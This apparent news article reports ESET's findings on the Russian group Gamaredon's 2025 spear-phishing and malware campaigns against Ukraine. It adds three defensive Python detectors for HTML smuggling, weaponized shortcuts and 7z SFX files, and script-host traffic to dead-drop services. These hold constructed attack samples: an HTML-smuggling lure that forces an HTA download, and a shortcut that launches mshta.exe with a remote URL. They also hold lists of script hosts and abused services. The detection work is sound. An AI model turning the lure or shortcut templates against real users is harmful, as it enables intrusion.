Gamaredon Expands Ukraine Attacks with New Malware and Cloud Service Abuse
The Hacker News, archived Jun 29, 2026
Ravie Lakshmanan, Jun 29, 2026 | Cloud Security / Malware
A Russian advanced persistent threat (APT) group has continued to evolve and expand its malware arsenal as part of its ongoing cyber onslaught against Ukraine throughout 2025.
Slovakian cybersecurity company ESET said it observed 35 distinct spear-phishing campaigns mounted by Gamaredon against new targets, with most of them taking place in the second half of the year. Primary targets of these efforts include Ukrainian governmental and military institutions.
"Throughout 2025, Gamaredon stayed highly active and remained focused solely on Ukraine," ESET said. "The group's ultimate goal continues to be the exfiltration of sensitive information and other critical data that could be exploited to support Russian interests in the ongoing war in Ukraine."
The spear-phishing campaigns make use of archive attachments or XHTML files that employ HTML smuggling to deliver malicious HTA downloaders that are responsible for dropping additional payloads, such as PteroSand. Some of the attacks have also weaponized a now-patched flaw in WinRAR (CVE-2025-8088) as a way of placing the malicious HTA downloader into the victim's Windows Startup folder.
This, in turn, causes the downloader to be automatically executed on the next login, thereby adding a persistence mechanism to the compromise chain. Gamaredon's attacks are known to rely on weaponizers like PteroLNK and PteroPaste to facilitate lateral movement by infecting USB drives and network drives with malicious LNK files that, when opened by an unsuspecting user, trigger the retrieval of downloader malware.
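The HTML smuggling described above assembles the HTA entirely in the browser, so the file never crosses the mail gateway as an attachment. As an added example (not code from the article or from ESET), the script below inspects an XHTML/HTML file for the JavaScript APIs that smuggling needs, decodes any long base64 literal it finds and classifies the decoded blob. The sample lure, the marker list and the two-marker threshold are this example's own assumptions; the embedded HTA only launches calc.exe.

```python
import base64
import re

# Constructed sample of an HTML-smuggling lure (test data written for this
# example, not a real Gamaredon file): a base64 blob is decoded by JavaScript,
# wrapped in a Blob and pushed to the user as a forced download with an .hta name.
_HTA_STUB = (b'<html><head><script language="VBScript">\r\n'
             b'Set sh = CreateObject("WScript.Shell")\r\n'
             b'sh.Run "calc.exe", 0, False\r\n'
             b'</script></head></html>')
SAMPLE_XHTML = f"""<?xml version="1.0" encoding="utf-8"?>
<html xmlns="http://www.w3.org/1999/xhtml"><body>
<p>The document is loading, please wait...</p>
<script>
var b64 = "{base64.b64encode(_HTA_STUB).decode()}";
var bin = atob(b64);
var buf = new Uint8Array(bin.length);
for (var i = 0; i < bin.length; i++) buf[i] = bin.charCodeAt(i);
var blob = new Blob([buf], {{type: "application/octet-stream"}});
var a = document.createElement("a");
a.href = URL.createObjectURL(blob);
a.download = "Report_2025.hta";
document.body.appendChild(a);
a.click();
</script></body></html>"""

# JavaScript APIs that HTML smuggling needs to assemble a file client-side (heuristic list).
JS_MARKERS = ("atob(", "new Blob(", "createObjectURL(", ".download",
              "Uint8Array(", "msSaveOrOpenBlob", "msSaveBlob")
B64_LITERAL = re.compile(r'["\']([A-Za-z0-9+/]{64,}={0,2})["\']')
DOWNLOAD_NAME = re.compile(r'\.download\s*=\s*["\']([^"\']+)["\']')


def classify_payload(blob: bytes) -> str:
    """Guess what a decoded blob is from its magic bytes or, for HTA/HTML, its content."""
    lower = blob[:4096].lower()
    if blob.startswith(b"MZ"):
        return "pe"
    if blob.startswith(b"PK\x03\x04"):
        return "zip"
    if blob.startswith(b"Rar!\x1a\x07"):
        return "rar"
    if blob.startswith(b"7z\xbc\xaf\x27\x1c"):
        return "7z"
    if b"<script" in lower and (b"vbscript" in lower or b"wscript.shell" in lower
                                or b"createobject(" in lower):
        return "hta"
    if b"<html" in lower or b"<script" in lower:
        return "html"
    return "unknown"


def analyse_html(text: str) -> dict:
    """Report smuggling indicators: file-assembly APIs, decodable base64 blobs, forced download names."""
    markers = [m for m in JS_MARKERS if m in text]
    payloads = []
    for m in B64_LITERAL.finditer(text):
        try:
            raw = base64.b64decode(m.group(1), validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        payloads.append({"offset": m.start(1), "size": len(raw), "kind": classify_payload(raw)})
    names = DOWNLOAD_NAME.findall(text)
    # Two or more assembly APIs plus at least one recognisable decoded blob: treat as smuggling.
    smuggling = len(markers) >= 2 and any(p["kind"] != "unknown" for p in payloads)
    return {"smuggling": smuggling, "js_markers": markers,
            "payloads": payloads, "download_names": names}


if __name__ == "__main__":
    print(analyse_html(SAMPLE_XHTML))
```

Real lures often split or obfuscate the base64 string and decode it in stages, so a production version should also evaluate string concatenations and `String.fromCharCode` loops; the point of the checker is that the decoded artifact, not the page, is what to classify.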
Also used is PteroSetup, an older Visual Basic Script (VBScript) weaponizer first detected in January 2021 and previously assumed to be discontinued. The tool scans USB and mapped network drives for legitimate installer files and, where it finds them, replaces each one with a 7z self-extracting (SFX) archive that bundles the original installer with a malicious VBScript downloader.
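Both the LNK weaponizers (PteroLNK, PteroPaste) and PteroSetup leave artifacts on removable and mapped drives that can be triaged offline. As an added example covering both paragraphs (not code from the article or from ESET), the script below parses the Shell Link header and StringData fields per MS-SHLLINK, flags shortcuts whose target or arguments launch a script host or carry a URL, and recognises a 7-Zip SFX layout (PE stub followed by a 7z stream). The `build_lnk` helper, the sample shortcuts, the `example.invalid` URL and the LOLBin list are this example's own constructions.

```python
import struct

# .lnk (Shell Link) header constants from the MS-SHLLINK specification.
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_IDLIST, HAS_LINKINFO, HAS_NAME, HAS_RELPATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKDIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
SW_SHOWMINNOACTIVE = 7
SEVENZ_MAGIC = b"7z\xbc\xaf\x27\x1c"
# Script/loader binaries a document shortcut on a USB stick has no reason to launch (assumed list).
LOLBINS = ("mshta", "powershell", "pwsh", "wscript", "cscript", "cmd.exe", "rundll32", "regsvr32")


def build_lnk(rel_path: str, args: str, show_cmd: int = 1) -> bytes:
    """Build a minimal Unicode .lnk (constructed test data; no IDList or LinkInfo sections)."""
    flags = HAS_RELPATH | HAS_ARGS | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, show_cmd, 0, 0, 0, 0)

    def string_data(s: str) -> bytes:
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + string_data(rel_path) + string_data(args)


def parse_lnk(data: bytes) -> dict:
    """Parse ShowCommand and the StringData fields (name, relative path, working dir, args, icon)."""
    if len(data) < 0x4C or data[:4] != b"\x4c\x00\x00\x00" or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags, = struct.unpack_from("<I", data, 20)
    show_cmd, = struct.unpack_from("<I", data, 60)
    pos = 0x4C
    if flags & HAS_IDLIST:                      # skip LinkTargetIDList
        size, = struct.unpack_from("<H", data, pos)
        pos += 2 + size
    if flags & HAS_LINKINFO:                    # skip LinkInfo (size field includes itself)
        size, = struct.unpack_from("<I", data, pos)
        pos += size
    fields = {"show_command": show_cmd}
    for bit, name in ((HAS_NAME, "name"), (HAS_RELPATH, "relative_path"), (HAS_WORKDIR, "working_dir"),
                      (HAS_ARGS, "arguments"), (HAS_ICON, "icon_location")):
        if not flags & bit:
            continue
        count, = struct.unpack_from("<H", data, pos)
        pos += 2
        if flags & IS_UNICODE:
            fields[name] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            fields[name] = data[pos:pos + count].decode("cp1252", "replace")
            pos += count
    return fields


def assess_lnk(fields: dict) -> list:
    """Reasons a shortcut looks like a drive-weaponizer artifact (empty list means nothing found)."""
    cmdline = (fields.get("relative_path", "") + " " + fields.get("arguments", "")).lower()
    reasons = []
    hits = [b for b in LOLBINS if b in cmdline]
    if hits:
        reasons.append("launches " + ", ".join(hits))
    if "http://" in cmdline or "https://" in cmdline:
        reasons.append("remote URL on the command line")
    if fields.get("show_command") == SW_SHOWMINNOACTIVE:
        reasons.append("window minimized and inactive (SW_SHOWMINNOACTIVE)")
    return reasons


def is_7z_sfx(data: bytes) -> bool:
    """True for a PE stub carrying an embedded 7z stream, the layout of a 7-Zip SFX archive."""
    return data[:2] == b"MZ" and data.find(SEVENZ_MAGIC, 0x40) != -1


# Constructed samples (not real artifacts).
SUSPICIOUS_LNK = build_lnk("..\\..\\Windows\\System32\\mshta.exe",
                           "http://example.invalid/doc.hta", SW_SHOWMINNOACTIVE)
BENIGN_LNK = build_lnk("..\\Reports\\Q3_summary.docx", "")
SFX_SAMPLE = b"MZ" + b"\x00" * 0x100 + SEVENZ_MAGIC + b"\x00" * 32
PLAIN_PE_SAMPLE = b"MZ" + b"\x00" * 0x100

if __name__ == "__main__":
    for label, blob in (("suspicious", SUSPICIOUS_LNK), ("benign", BENIGN_LNK)):
        f = parse_lnk(blob)
        print(label, f["relative_path"], f["arguments"], assess_lnk(f) or "clean")
    print("7z SFX:", is_7z_sfx(SFX_SAMPLE), is_7z_sfx(PLAIN_PE_SAMPLE))
```

The SFX check is a triage signal, not a verdict: legitimate installers are also built as 7-Zip SFX, so on a drive where an installer was expected, compare the file against a known-good copy or hash rather than acting on the layout alone.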
"In 2025, the group's reliance on third-party services grew significantly, with tunnel services and serverless worker platforms becoming an increasingly important part of how it hid its real back-end infrastructure," ESET said.
The attacks are also characterized by the introduction of six new malicious PowerShell tools, broadening its custom malware arsenal -
PteroDee and PteroCache for fetching and executing PowerShell payloads in memory
PteroDum for fetching and executing VBScript payloads in memory
PteroOdd for fetching a single PowerShell payload using the Telegra.ph API and likely used in campaigns in which the Gamaredon actors collaborated with Turla
PteroEffigy for fetching the command-and-control (C2) server using the GoFile cloud storage service
PteroPaste for weaponizing USB drives and downloading additional PowerShell payloads via an encrypted channel
"While the group took a short operational break in January 2025, Gamaredon spent much of its effort in the first half of that year developing and deploying new tools," ESET researcher Zoltán Rusnák said.
"Many updates were made in the lead-up to major holidays in Russia and Crimea. Notably, no updates were observed during or immediately after these holidays, further suggesting that Gamaredon operators are probably government-affiliated employees."
Another noteworthy aspect of the threat actor's campaign revolves around the use of a wide range of legitimate services as data exfiltration channels and dead drop resolvers to obtain details of the C2 server and to point malware to infrastructure already hidden behind tunnels or serverless workers. These include -
Telegra.ph
Teletype
Rentry.co
Write.as
Dropbox
GoFile
DEV Community (dev.to)
Mastodon
Lesma
Nopaste.net
Paste.ee
Wasabi
Tebi
Intercolo
"As in previous years, the group compensated for the relative simplicity of its malware with persistence, frequent updates, and an increasingly creative abuse of legitimate online services," ESET said. "Gamaredon further expanded its use of dead drops, tunnels, workers, dynamic DNS, and cloud storage, making its operations more flexible and harder to disrupt."
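Because these services are legitimate and widely used, blocking them outright is rarely an option; what stands out is which process is talking to them. As an added example (not code from the article or from ESET), the script below runs a simple detection over constructed EDR-style network telemetry: it ignores browsers and mail clients and reports script hosts that reach the services listed above. The article names services, not hostnames, so the domain mapping is this example's assumption to adapt per environment; Mastodon is federated and has no single domain, and Lesma and Intercolo are left unmapped here.

```python
from collections import defaultdict

# Assumed hostnames for some of the services the article names (adjust per environment).
DEAD_DROP_DOMAINS = {
    "telegra.ph": "Telegra.ph", "teletype.in": "Teletype", "rentry.co": "Rentry.co",
    "write.as": "Write.as", "dropbox.com": "Dropbox", "dropboxusercontent.com": "Dropbox",
    "gofile.io": "GoFile", "dev.to": "DEV Community", "nopaste.net": "Nopaste.net",
    "paste.ee": "Paste.ee", "wasabisys.com": "Wasabi", "tebi.io": "Tebi",
}
# Script hosts the PowerShell/VBScript downloaders run under; other processes are ignored.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Constructed telemetry, one event per line: "<timestamp> <host> <process> <destination>".
SAMPLE_LOG = """\
2025-10-14T08:02:11Z WS-0413 chrome.exe www.dropbox.com
2025-10-14T08:02:45Z WS-0413 powershell.exe telegra.ph
2025-10-14T08:02:46Z WS-0413 powershell.exe api.telegra.ph
2025-10-14T08:03:10Z WS-0413 powershell.exe gofile.io
2025-10-14T08:05:00Z WS-0291 outlook.exe outlook.office365.com
2025-10-14T08:06:30Z WS-0291 wscript.exe rentry.co
2025-10-14T08:07:02Z WS-0102 powershell.exe wsus.corp.example
"""


def service_for(host: str):
    """Map a destination hostname (or any subdomain of it) to a service name, or None."""
    host = host.lower().rstrip(".")
    for domain, name in DEAD_DROP_DOMAINS.items():
        if host == domain or host.endswith("." + domain):
            return name
    return None


def find_dead_drop_activity(lines, high_threshold: int = 2) -> list:
    """Per (host, process): which listed services a script host reached. One service is a 'low'
    finding; reaching several distinct services from one script process rates 'high'."""
    seen = defaultdict(set)
    for line in lines:
        parts = line.split()
        if len(parts) < 4:
            continue
        _ts, host, proc, dest = parts[:4]
        proc = proc.lower()
        if proc not in SCRIPT_HOSTS:
            continue
        svc = service_for(dest)
        if svc:
            seen[(host, proc)].add(svc)
    alerts = []
    for (host, proc), services in sorted(seen.items()):
        alerts.append({"host": host, "process": proc, "services": sorted(services),
                       "severity": "high" if len(services) >= high_threshold else "low"})
    return alerts


if __name__ == "__main__":
    for alert in find_dead_drop_activity(SAMPLE_LOG.splitlines()):
        print(alert)
```

Administrative PowerShell that legitimately pulls from Dropbox or Wasabi will trip the low-severity rule, so pair it with the process's parent (a script host spawned from an Office document or mshta is the interesting case) and with the file the downloader subsequently writes, rather than alerting on the connection alone.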
Tags: Cloud security, Gamaredon, HTML Smuggling, Malware, PowerShell, Russia, Spear Phishing, Ukraine, WinRAR